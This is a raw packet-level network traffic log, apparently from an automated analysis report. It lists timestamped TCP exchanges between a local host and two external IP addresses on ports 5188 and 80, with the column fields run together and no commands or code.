                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.208096027 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.209114075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.209208965 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.209758997 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.210298061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.210454941 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.211373091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.211419106 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.211575985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.212613106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.212661982 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.212717056 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.212758064 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.213630915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.214109898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.214157104 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.214792013 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.215437889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.215482950 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.215910912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.216515064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.217027903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.217072010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.217526913 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.218241930 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.218288898 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.218373060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.218413115 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.219472885 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.219794989 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.220962048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.221004009 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.221013069 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.221683025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.221728086 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.266823053 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.266850948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.266984940 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.267371893 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.267420053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.267472029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.267509937 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.268587112 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.268659115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.268733025 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.269727945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.269782066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.269794941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.269829988 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.270878077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.270940065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.270991087 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.272041082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.272094965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.272299051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.272344112 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.273171902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.273212910 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.273216009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.273272038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.274327040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.274372101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.274420023 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.275371075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.275424004 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.275474072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.275521040 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.276304960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.276360989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.276565075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.276607990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.277276039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.277329922 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.277692080 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.277738094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.278243065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.278287888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.278367043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.278419971 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.279190063 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.279242992 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.279309988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.279350042 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.280127048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.280767918 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.280818939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.281079054 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.281092882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.281116009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.281146049 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.281984091 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.282300949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.282387018 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.282902002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.282965899 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.283071995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.283111095 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.283902884 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.283961058 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.284044027 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.284080029 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.284982920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285003901 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285037994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285058022 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285820007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285866022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.285913944 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.286650896 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.286706924 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.287111044 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.287158012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.287599087 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.287657976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.288036108 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.288084030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.288603067 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.288655043 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.289033890 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.289077044 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.289544106 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.289557934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.289587975 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.290378094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.290426016 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.290539980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.290580034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.291307926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.291352987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.291484118 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.291523933 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.292233944 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.292325974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.292373896 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.293226004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.293282032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.293484926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.293529034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.294214964 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.294266939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.294275045 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.294306993 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.295070887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.295145988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.295238018 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.296057940 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.296103001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.296109915 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.296138048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.297539949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.297594070 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.297637939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.297672987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298145056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298165083 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298207045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298846006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298891068 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298923969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.298959017 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.299683094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.299768925 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.299926996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.299978018 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.300584078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.300641060 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.300683975 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.300719976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.301589012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.301644087 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.301765919 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.301801920 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.302463055 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.302512884 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.302635908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.302675009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.303416014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.303467989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.303682089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.303733110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.304352999 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.304404020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.304512978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.304550886 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.305236101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.305285931 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.305298090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.305332899 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.306226969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.306276083 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.306277990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.306303024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.307400942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.307415962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.307466030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.308096886 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.308141947 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.308147907 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.308182001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.309036016 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.309092045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.309406996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.309454918 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.309912920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310240030 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310292959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310847998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310909033 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310950994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.310996056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.311779022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.311841011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312217951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312269926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312683105 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312731028 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312865019 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.312900066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.313638926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.313689947 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.313720942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.313754082 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.314302921 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.314348936 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.314584017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.314630985 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.315217018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.315272093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.315474987 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.315524101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.316159010 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.316224098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.316268921 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.317050934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.317107916 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.353965998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354007959 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354027033 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354131937 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354338884 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354425907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354449987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354482889 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.354497910 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.355344057 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.355382919 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.355395079 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.355443954 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.356409073 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.356451035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.356463909 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.356503963 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.357244015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.357299089 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.357311964 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.357359886 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.358233929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.358282089 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.358283043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.358297110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.358345032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.359190941 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.359213114 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.359225035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.359273911 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.360088110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.360152960 CET51884979292.255.85.66192.168.2.11
